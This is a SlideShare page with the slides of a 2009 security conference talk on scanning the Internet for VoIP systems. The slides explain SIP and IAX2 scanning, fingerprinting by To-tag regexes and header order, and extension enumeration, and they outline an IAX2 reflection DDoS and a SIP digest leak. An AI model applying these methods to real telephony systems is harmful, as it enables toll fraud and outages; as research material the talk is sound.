SlideShare ist ein Scribd-Unternehmen logo

Scanning The Intertubes For Voip

Sandro Gauci
Sandro Gauci

Most research and publications talk about layer 2 issues when it comes to VoIP. Over here we talk about VoIP security flaws that can be exploited without having physical access to the target network, i.e. attacks that can be, and are being launched through the Internet.

1 von 54
Downloaden Sie, um offline zu lesen
ENABLESECURITY Scanning the Intertubes for VOIP Telephony exposed on the ‘net Con dence 2009
ENABLESECURITY whoami • EnableSecurity • 9 years old • SIPVicious and VOIPPACK (for CANVAS) • Surfjack, Extended HTML Form attack Con dence 2009
ENABLESECURITY next few minutes • Brief intro to how VoIP is being abused • Scanning for VoIP systems • How to fingerprint VoIP systems • Possibilities for abuse Con dence 2009
ENABLESECURITY VoIP Scanning • SIP • IAX2 • H.323 • SCCP Con dence 2009
ENABLESECURITY A primer on SIP • Text based just like HTTP • UDP port 5060 • INVITE gets things to buzz and ring • REGISTER sends phone calls your way • OPTIONS gives you supported options Con dence 2009
ENABLESECURITY A primer on IAX2 • Binary protocol running on port 4569 • POKE is like ping • PONG is like er.. pong • REGREQ is like REGISTER • REGREJ stands for registration rejected Con dence 2009
ENABLESECURITY VoIP and Cybercrime • Scans for SIP are on the rise • News of fraud • What is happening in the background? • What tools are they using? Con dence 2009
ENABLESECURITY Scans OPTIONS sip:2658@195.159.X.X SIP/2.0 Via: SIP/2.0/UDP 0.0.0.0:1498;branch=BCEA2F83-1CEF-FC6A-2989-54C18CE6425E;rport Max-Forwards: 70 To: <sip:2658@195.159.X.X> From: <sip:8571@195.159.X.X>;tag=723535DC-E71F-E3D4-D572-2B41E58782E8 Call-ID: 4203F1B5-3E1F-E6D6-32FF-B8C2DFAA190F CSeq: 1 OPTIONS Contact: <sip:@0.0.0.0:1498;transport=udp> Accept: application/sdp Content-Length: 0 Con dence 2009
ENABLESECURITY Honeypot • Some python code put together • Replies to requests and acts like a registrar Con dence 2009
ENABLESECURITY demo Con dence 2009
ENABLESECURITY SIP Scanning • OPTIONS is ideal for this • REGISTER adds value :-) • Tell between a registrar and an endpoint Con dence 2009
ENABLESECURITY OPTIONS scan OPTIONS SIP scanner Registrar 200 OK Con dence 2009
ENABLESECURITY Con dence 2009
ENABLESECURITY Scanning IAX2 POKE Asterisk scanner Box PONG Con dence 2009
ENABLESECURITY Con dence 2009
ENABLESECURITY Headers of interest SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
ENABLESECURITY Modified User-agent SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: MyVeryOwn PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
ENABLESECURITY Give away SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: MyVeryOwn PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
ENABLESECURITY Give away SIP/2.0 404 Not found Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061 From: quot;testquot; <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c To: quot;testquot; <sip:100@1.2.3.4:5060>;tag=as05610bff Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d CSeq: 1 REGISTER User-Agent: MyVeryOwn PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Content-Length: 0 Con dence 2009
ENABLESECURITY Fingerprinting To Tag Sipura / Linksys SPA [a-fA-F0-9]{16}i0 [a-fA-F0-9]{6,8}-[a-fA- Cisco VoIP Gateway F0-9]{2,4} AVM FRITZ!Box [a-fA-F0-9]{16,29} Con dence 2009
ENABLESECURITY Order of headers SIP/2.0 200 OK Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 CSeq: 1 OPTIONS User-Agent: xxx voicemail Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Contact: <sip:1.2.3.35> Accept: application/sdp Content-Length: 0 Con dence 2009
ENABLESECURITY Order of headers SIP/2.0 404 Not Found Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-59202;received=3.2.1.9;rport=5061 From: quot;helloquot; <sip:100@1.2.3.138:5060>;tag=d90a4f8a13c4d8bf89f5 To: quot;helloquot; <sip:100@1.2.3.138:5060>;tag=as263e3393 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 CSeq: 1 OPTIONS User-Agent: xxx asterisk Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Supported: replaces Accept: application/sdp Content-Length: 0 Con dence 2009
ENABLESECURITY Order of headers SIP/2.0 200 OK SIP/2.0 404 Not Found Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK- From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 <sip:100@1.2.3.138:5060>;tag=d9 From: quot;helloquot; To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68To: quot;helloquot; <sip:100@1.2.3.138:5060>;tag=as26 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 CSeq: 1 OPTIONS CSeq: 1 OPTIONS User-Agent: sipgate voicemail User-Agent: sipbox asterisk Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REF Contact: <sip:1.2.3.35> Supported: replaces Accept: application/sdp Accept: application/sdp Content-Length: 0 Content-Length: 0 Con dence 2009
ENABLESECURITY Order of headers SIP/2.0 200 OK SIP/2.0 401 Unauthorized Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK- From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 <sip:100@1.2.3.40:5060>;tag=d90 From: quot;helloquot; To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68To: quot;helloquot; <sip:100@1.2.3.40:5060>;tag=cfbe3 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 Cseq: 1 REGISTER CSeq: 1 OPTIONS Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 User-Agent: sipgate voicemail WWW-Authenticate: Digest realm=quot;sipgate.atquot;, Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY0 Content-Length: Contact: <sip:1.2.3.35> Accept: application/sdp Content-Length: 0 Con dence 2009
ENABLESECURITY Case for header names SIP/2.0 200 OK SIP/2.0 401 Unauthorized Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-24832;rport;received=3.2.1.9 Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK- From: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=d90a4f2313c4cc438e14 <sip:100@1.2.3.40:5060>;tag=d90 From: quot;helloquot; To: quot;helloquot; <sip:100@1.2.3.35:5060>;tag=as00ea0c68To: quot;helloquot; <sip:100@1.2.3.40:5060>;tag=cfbe3 Call-ID: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 Cseq: 1 REGISTER CSeq: 1 OPTIONS Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663 User-Agent: sipgate voicemail WWW-Authenticate: Digest realm=quot;sipgate.atquot;, Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY0 Content-Length: Contact: <sip:1.2.3.35> Accept: application/sdp Content-Length: 0 Con dence 2009
ENABLESECURITY Fingerprinting • Just one packet needed • To tag • Headers • Community effort Con dence 2009
ENABLESECURITY Community effort • SIPVicious 0.2.3 • Included svlearnfp.py • Generated regular expressions for to tags • Generated hashes describing headers • SIPVicious 2.0 ... Con dence 2009
ENABLESECURITY Interesting facts • Random scans work pretty well • ADSL etc FRITZ!Box, Speedtouch • Asterisk • Cisco Gateways Con dence 2009
ENABLESECURITY demo Con dence 2009
ENABLESECURITY Introducing REGISTER • Binds an extension to an IP and port • Normally requires authentication • If no password is set it binds without auth Con dence 2009
ENABLESECURITY More interesting facts • The REGISTER scan • Dangerous • Useful for cheap honeypots :-) Con dence 2009
ENABLESECURITY Enumeration of extensions • Response to a REGISTER for non-existent extension • A different response indicates that the extension exists • If the extension has no password it sends a 200 OK • Otherwise asks for authentication Con dence 2009
ENABLESECURITY * 1 00 ER EG IST R ISTE R 101 REG REGISTER 102 Con dence 2009
ENABLESECURITY * nd ot fou 40 4N 20 0 OK 401 Auth required Con dence 2009
ENABLESECURITY demo Con dence 2009
ENABLESECURITY DDoS using IAX2? REG REQ * :-) ACK REGREJ ACK Con dence 2009
ENABLESECURITY DDoS using IAX2? REG REQ * }:-) ACK REGREJ Con dence 2009
ENABLESECURITY DDoS using IAX2? REG REQ * }:-) ACK REGREJ REGREJ Con dence 2009
ENABLESECURITY DDoS using IAX2? REG REQ * }:-) ACK REGREJ REGREJ REGREJ Con dence 2009
ENABLESECURITY DDoS using IAX2? }:-) REGR EQ * :-/ ACK REGREJ REGREJ REGREJ Con dence 2009
ENABLESECURITY DDoS using IAX2? ** ** :-o ** ** * }:-) Con dence 2009
ENABLESECURITY DDoS using IAX2? ** ** :’-( ** ** * }:-) Con dence 2009
ENABLESECURITY Con dence 2009
ENABLESECURITY SIP Digest Auth • REGISTER usually gets a 401 Unauthorized • INVITE gets a 407 Proxy Authentication • Challenge response mechanism • Takes various properties + password • Nonce, Method, URI Con dence 2009
ENABLESECURITY Digest Leak INVITE 200 OK Con dence 2009
ENABLESECURITY Digest Leak BYE 407 Challenge Con dence 2009
ENABLESECURITY demo Con dence 2009
ENABLESECURITY Vulnerable endpoints • X-lite • Gizmo5 • Zoiper Con dence 2009
ENABLESECURITY Vulnerable endpoints • Cisco 7940 • Grandstream GXP* • Patton Smartlink • Linksys SPA942 • Fritzbox Con dence 2009
ENABLESECURITY But ... • There’s no SIP Phones on the ‘net! • There are ;-) • The ‘net is full of Fritzbox • Internal endpoints behind NAT Con dence 2009
ENABLESECURITY More at.. • EnableSecurity.com/research • Sipvicious.org • VOIPSA.org Con dence 2009
ENABLESECURITY Shoutouts! • Sjur at usken.no • dudes from .mt =) Con dence 2009
ENABLESECURITY Q.A Con dence 2009
ENABLESECURITY sandro@enablesecurity.com Con dence 2009

Empfohlen

Securing Asterisk: A practical approach
Securing Asterisk: A practical approachSecuring Asterisk: A practical approach
Securing Asterisk: A practical approachBangladesh Network Operators Group
 
Sip basic KT
Sip basic KTSip basic KT
Sip basic KTChandra Pr. Singh
 
Cisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBookCisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBookRHC Technologies
 
IS-IS Routing Lab WorkBook
IS-IS Routing Lab WorkBookIS-IS Routing Lab WorkBook
IS-IS Routing Lab WorkBookRHC Technologies
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 aSelectedPresentations
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014Flavio Eduardo de Andrade Goncalves
 
Number one-issue-voip-today-fraud
Number one-issue-voip-today-fraudNumber one-issue-voip-today-fraud
Number one-issue-voip-today-fraudFlavio Eduardo de Andrade Goncalves
 
DMVPN Lab WorkBook
DMVPN Lab WorkBookDMVPN Lab WorkBook
DMVPN Lab WorkBookRHC Technologies
 

Empfohlen

Securing Asterisk: A practical approach
Securing Asterisk: A practical approachSecuring Asterisk: A practical approach
Securing Asterisk: A practical approachBangladesh Network Operators Group
 
Sip basic KT
Sip basic KTSip basic KT
Sip basic KTChandra Pr. Singh
 
Cisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBookCisco ASA Firewall Lab WorkBook
Cisco ASA Firewall Lab WorkBookRHC Technologies
 
IS-IS Routing Lab WorkBook
IS-IS Routing Lab WorkBookIS-IS Routing Lab WorkBook
IS-IS Routing Lab WorkBookRHC Technologies
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 aSelectedPresentations
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014Flavio Eduardo de Andrade Goncalves
 
Number one-issue-voip-today-fraud
Number one-issue-voip-today-fraudNumber one-issue-voip-today-fraud
Number one-issue-voip-today-fraudFlavio Eduardo de Andrade Goncalves
 
DMVPN Lab WorkBook
DMVPN Lab WorkBookDMVPN Lab WorkBook
DMVPN Lab WorkBookRHC Technologies
 
6.5.1.2 packet tracer layer 2 security instructor
6.5.1.2 packet tracer layer 2 security instructor6.5.1.2 packet tracer layer 2 security instructor
6.5.1.2 packet tracer layer 2 security instructorSalem Trabelsi
 
BGP Route Reflectors Lab WorkBook
BGP Route Reflectors Lab WorkBookBGP Route Reflectors Lab WorkBook
BGP Route Reflectors Lab WorkBookRHC Technologies
 
4.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 14.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 1mps125
 
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructorSalem Trabelsi
 
VRF Lab WorkBook
VRF Lab WorkBookVRF Lab WorkBook
VRF Lab WorkBookRHC Technologies
 
BGP Route Aggregation Lab WorkBook
BGP Route Aggregation Lab WorkBookBGP Route Aggregation Lab WorkBook
BGP Route Aggregation Lab WorkBookRHC Technologies
 
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...Salem Trabelsi
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014Flavio Eduardo de Andrade Goncalves
 
6.5.1.3 packet tracer layer 2 vlan security instructor
6.5.1.3 packet tracer layer 2 vlan security instructor6.5.1.3 packet tracer layer 2 vlan security instructor
6.5.1.3 packet tracer layer 2 vlan security instructorSalem Trabelsi
 
Cisco Connect Ottawa 2018 secure on prem
Cisco Connect Ottawa 2018 secure on premCisco Connect Ottawa 2018 secure on prem
Cisco Connect Ottawa 2018 secure on premCisco Canada
 
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...Salem Trabelsi
 
Understanding and Preventing Layer 2 Attacks
Understanding and Preventing Layer 2 AttacksUnderstanding and Preventing Layer 2 Attacks
Understanding and Preventing Layer 2 AttacksTien Dung
 
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Jordi Cabot
 
Ipsec
IpsecIpsec
IpsecEddy Barzallo
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modemCyber Security Alliance
 
Using security certificates on yealink ip phones v83 10
Using security certificates on yealink ip phones v83 10Using security certificates on yealink ip phones v83 10
Using security certificates on yealink ip phones v83 10NguyenManhQuan3
 
SIP Pap2 T Sip 1 SETTING
SIP Pap2 T Sip 1 SETTINGSIP Pap2 T Sip 1 SETTING
SIP Pap2 T Sip 1 SETTINGakbar2266778899
 
Nse4 fgt 6.0
Nse4 fgt 6.0Nse4 fgt 6.0
Nse4 fgt 6.0Salem Trabelsi
 
3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pubCassio Ramos
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...PROIDEA
 
Sip crash course
Sip crash courseSip crash course
Sip crash courseJonas Borjesson
 
SIP Express Media Server SBC application as powerful SBC and SIP toolbox
SIP Express Media Server SBC application as powerful SBC and SIP toolboxSIP Express Media Server SBC application as powerful SBC and SIP toolbox
SIP Express Media Server SBC application as powerful SBC and SIP toolboxstefansayer
 

Weitere ähnliche Inhalte

Was ist angesagt?

6.5.1.2 packet tracer layer 2 security instructor
6.5.1.2 packet tracer layer 2 security instructor6.5.1.2 packet tracer layer 2 security instructor
6.5.1.2 packet tracer layer 2 security instructorSalem Trabelsi
 
BGP Route Reflectors Lab WorkBook
BGP Route Reflectors Lab WorkBookBGP Route Reflectors Lab WorkBook
BGP Route Reflectors Lab WorkBookRHC Technologies
 
4.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 14.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 1mps125
 
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructorSalem Trabelsi
 
BGP Route Aggregation Lab WorkBook
BGP Route Aggregation Lab WorkBookBGP Route Aggregation Lab WorkBook
BGP Route Aggregation Lab WorkBookRHC Technologies
 
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...Salem Trabelsi
 
6.5.1.3 packet tracer layer 2 vlan security instructor
6.5.1.3 packet tracer layer 2 vlan security instructor6.5.1.3 packet tracer layer 2 vlan security instructor
6.5.1.3 packet tracer layer 2 vlan security instructorSalem Trabelsi
 
Cisco Connect Ottawa 2018 secure on prem
Cisco Connect Ottawa 2018 secure on premCisco Connect Ottawa 2018 secure on prem
Cisco Connect Ottawa 2018 secure on premCisco Canada
 
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...Salem Trabelsi
 
Understanding and Preventing Layer 2 Attacks
Understanding and Preventing Layer 2 AttacksUnderstanding and Preventing Layer 2 Attacks
Understanding and Preventing Layer 2 AttacksTien Dung
 
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Jordi Cabot
 
Using security certificates on yealink ip phones v83 10
Using security certificates on yealink ip phones v83 10Using security certificates on yealink ip phones v83 10
Using security certificates on yealink ip phones v83 10NguyenManhQuan3
 
SIP Pap2 T Sip 1 SETTING
SIP Pap2 T Sip 1 SETTINGSIP Pap2 T Sip 1 SETTING
SIP Pap2 T Sip 1 SETTINGakbar2266778899
 
3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pubCassio Ramos
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...PROIDEA
 

Was ist angesagt? (20)

6.5.1.2 packet tracer layer 2 security instructor
6.5.1.2 packet tracer layer 2 security instructor6.5.1.2 packet tracer layer 2 security instructor
6.5.1.2 packet tracer layer 2 security instructor
 
BGP Route Reflectors Lab WorkBook
BGP Route Reflectors Lab WorkBookBGP Route Reflectors Lab WorkBook
BGP Route Reflectors Lab WorkBook
 
4.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 14.1.1.10 packet tracer configuring extended ac ls scenario 1
4.1.1.10 packet tracer configuring extended ac ls scenario 1
 
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor
4.4.1.2 packet tracer configure ip ac ls to mitigate attacks-instructor
 
VRF Lab WorkBook
VRF Lab WorkBookVRF Lab WorkBook
VRF Lab WorkBook
 
BGP Route Aggregation Lab WorkBook
BGP Route Aggregation Lab WorkBookBGP Route Aggregation Lab WorkBook
BGP Route Aggregation Lab WorkBook
 
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...
5.5.1.2 packet tracer configure ios intrusion prevention system (ips) using...
 
No More Fraud Cluecon2014
No More Fraud Cluecon2014No More Fraud Cluecon2014
No More Fraud Cluecon2014
 
6.5.1.3 packet tracer layer 2 vlan security instructor
6.5.1.3 packet tracer layer 2 vlan security instructor6.5.1.3 packet tracer layer 2 vlan security instructor
6.5.1.3 packet tracer layer 2 vlan security instructor
 
Cisco Connect Ottawa 2018 secure on prem
Cisco Connect Ottawa 2018 secure on premCisco Connect Ottawa 2018 secure on prem
Cisco Connect Ottawa 2018 secure on prem
 
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
4.4.1.3 packet tracer configuring a zone-based policy firewall (zpf) instru...
 
Understanding and Preventing Layer 2 Attacks
Understanding and Preventing Layer 2 AttacksUnderstanding and Preventing Layer 2 Attacks
Understanding and Preventing Layer 2 Attacks
 
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
 
Ipsec
IpsecIpsec
Ipsec
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
Using security certificates on yealink ip phones v83 10
Using security certificates on yealink ip phones v83 10Using security certificates on yealink ip phones v83 10
Using security certificates on yealink ip phones v83 10
 
SIP Pap2 T Sip 1 SETTING
SIP Pap2 T Sip 1 SETTINGSIP Pap2 T Sip 1 SETTING
SIP Pap2 T Sip 1 SETTING
 
Nse4 fgt 6.0
Nse4 fgt 6.0Nse4 fgt 6.0
Nse4 fgt 6.0
 
3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub3 scanning-ger paoctes-pub
3 scanning-ger paoctes-pub
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
 

Ähnlich wie Scanning The Intertubes For Voip

SIP Express Media Server SBC application as powerful SBC and SIP toolbox
SIP Express Media Server SBC application as powerful SBC and SIP toolboxSIP Express Media Server SBC application as powerful SBC and SIP toolbox
SIP Express Media Server SBC application as powerful SBC and SIP toolboxstefansayer
 
Authenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call ControlAuthenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call ControlWarren Bent
 
Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2Warren Bent
 
VoIP on LTE -packet Filter
VoIP on LTE -packet FilterVoIP on LTE -packet Filter
VoIP on LTE -packet Filterraj_naveen
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
 
WebRTC meetup barcelona 2017
WebRTC meetup barcelona 2017WebRTC meetup barcelona 2017
WebRTC meetup barcelona 2017Juan De Bravo
 
Session Initiation Protocol - In depth analysis
Session Initiation Protocol - In depth analysisSession Initiation Protocol - In depth analysis
Session Initiation Protocol - In depth analysischinmaypadhye1985
 
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...
us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-La...sonjeku1
 
Hacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP GatewaysHacking Trust Relationships Between SIP Gateways
Hacking Trust Relationships Between SIP GatewaysFatih Ozavci
 
"Seguridad" VoIP
"Seguridad" VoIP"Seguridad" VoIP
"Seguridad" VoIPfixxx3r
 
Gpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkom
Gpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkomGpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkom
Gpon omci v2__voice_configuration_introduction_omciv2_v2_pt_telkomWahyu Nasution
 
VoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol ProblemsVoIP security: Implementation and Protocol Problems
VoIP security: Implementation and Protocol Problemsseanhn
 
Office Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 PosterOffice Comunnications Server 2007 R2 Poster
Office Comunnications Server 2007 R2 PosterPaulo Freitas
 
Microsoft lync server 2010 protocol workloads poster
Microsoft lync server 2010 protocol workloads posterMicrosoft lync server 2010 protocol workloads poster
Microsoft lync server 2010 protocol workloads posterbigwalker
 
Designing High Performance RTC Signaling Servers
Designing High Performance RTC Signaling ServersDesigning High Performance RTC Signaling Servers
Designing High Performance RTC Signaling ServersDaniel-Constantin Mierla
 
Session Initiation Protocol
Session Initiation ProtocolSession Initiation Protocol
Session Initiation ProtocolMatt Bynum
 
SIP in action Itexpo West
SIP in action Itexpo WestSIP in action Itexpo West
SIP in action Itexpo WestGraham Francis
 

Ähnlich wie Scanning The Intertubes For Voip (20)

Sip crash course
Sip crash courseSip crash course
Sip crash course
 
SIP Express Media Server SBC application as powerful SBC and SIP toolbox
SIP Express Media Server SBC application as powerful SBC and SIP toolboxSIP Express Media Server SBC application as powerful SBC and SIP toolbox
SIP Express Media Server SBC application as powerful SBC and SIP toolbox
 
Authenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call ControlAuthenticated Identites in VoIP Call Control
Authenticated Identites in VoIP Call Control
 
Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2Presentation To Vo Ip Round Table V2
Presentation To Vo Ip Round Table V2
 
VoIP on LTE -packet Filter
VoIP on LTE -packet FilterVoIP on LTE -packet Filter
VoIP on LTE -packet Filter
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
 
WebRTC meetup barcelona 2017
